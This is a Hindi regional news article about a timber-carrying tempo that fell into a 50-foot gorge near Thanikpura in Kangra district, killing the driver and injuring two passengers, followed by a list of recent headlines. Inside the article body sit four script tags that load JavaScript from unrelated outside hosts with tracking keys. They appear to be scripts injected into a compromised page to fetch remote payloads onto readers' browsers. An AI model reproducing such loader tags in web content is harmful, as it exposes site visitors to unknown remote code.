कांगड़ाः थनिकपुरा NH पर 50 फुट गहरी खाई में गिरा टेंपू, 1 की मौत

<p>जिला कांगड़ा में एक सड़क हादसा सामने आया है। हादसे में एक व्यक्ति की मौत हो गई जबकि दो लोग घायल हो गए। जानकारी के अनुसार चिंतपूर्णी पुलिस थाना के अतंर्गत आने वाले थनिकपुरा के पास नेशनल हाइवे पर आज सुबह चार बजे के करीब टेंपू हादसे का शिकार हो गया। टेंपू में लकडी लदी हुई थी जो कि थनिकपुरा के चाट वाला मोड़ से थोड़ा आगे करीब 50 फुट गहरी खाई के नीचे गिर गया।</p>

<p>बताया जा रहा है कि लकड़ी किसी ठेकेदार की थी। टेंपू में सवार लोग इसे बेचने के लिए होशियारपुर जा रहे थे लेकिन बीच रास्ते में यह हादसा हो गया। हादसे की सूचना मिलते पुलिस मौके पर पहुंची और घायलों को सड़क तक पहुंचाया। मृतक चालक की पहचान खुंडिया निवासी के रूप में हुई है और गाड़ी में सवार अनूप कुमार पुत्र देस राज और रमेश पुत्र वीरबल घायल हुए हैं।</p>

<p>पुलिस ने मामला दर्ज कर आगामी कार्रवाई कर रही है। घायलों को इलाज के लिए सिविल अस्पताल चिंतपूर्णी में भर्ती करवाया है। डीएसपी सृष्टि ने बताया कि प्रारंभिक दृष्टि में यह दुर्घटना चालक की लापरवाही से हुई लग रही है। इसके बावजूद पुलिस अन्य कारणों की भी जांच कर रही है।</p>

<p><img src=”/media/gallery/images/image(1549).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1605247739398″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

बाहर से आने वाले ऐशगाह न बनाएं हिमाचल को: राज्यपाल

  Shimla: शिमला के संजौली मस्जिद विवाद के बाद हिमाचल प्रदेश में गरमाए सियासी माहौल…

2 hours ago

हिमाचल में चलेगा योगी मॉडल, हर भोजनालय पर पहचान पत्र लगाना अनिवार्य

  Shimla:योगी माडल को हिमाचल अपनाने जा रहा है। यूपी की तर्ज पर हर भोजनालय,…

3 hours ago

आपसी रंजिश में चली गोलियां, एक गंभीर, भड़के ग्रामीणों ने किरतपुर-नेरचौक फोरलेन किया जाम

  Bilaspur: उपमंडल श्री नयना देवी जी के बैहल में आपसी रंजिश के चलते हुए…

3 hours ago

ए. शैनामोल मंडी की नई मंडलायुक्त, संदीप कदम को शिमला की जिम्मेदारी

पांच आईएएस अधिकारियों के तबादला और नियुक्ति आदेश क्लिक करें और पढें पूरी सूची Shimla:…

7 hours ago

HP Board परीक्षाओं में 50% प्रश्न होंगे योग्यता आधारित, जानें नई व्यवस्था

  धर्मशाला। हिमाचल प्रदेश स्कूल शिक्षा बोर्ड परीक्षाओं के पैटर्न में बड़े बदलाव की तैयारी…

8 hours ago

Mandi: पति को कुंए में डूबा देख पत्‍नी ने भी लगाई छलांग, दोनों की दर्दनाक मौत

मंडी के रखोह के कलोह गांव की घटना मृतक वार्ड पंच और पत्‍नी थी आशा…

9 hours ago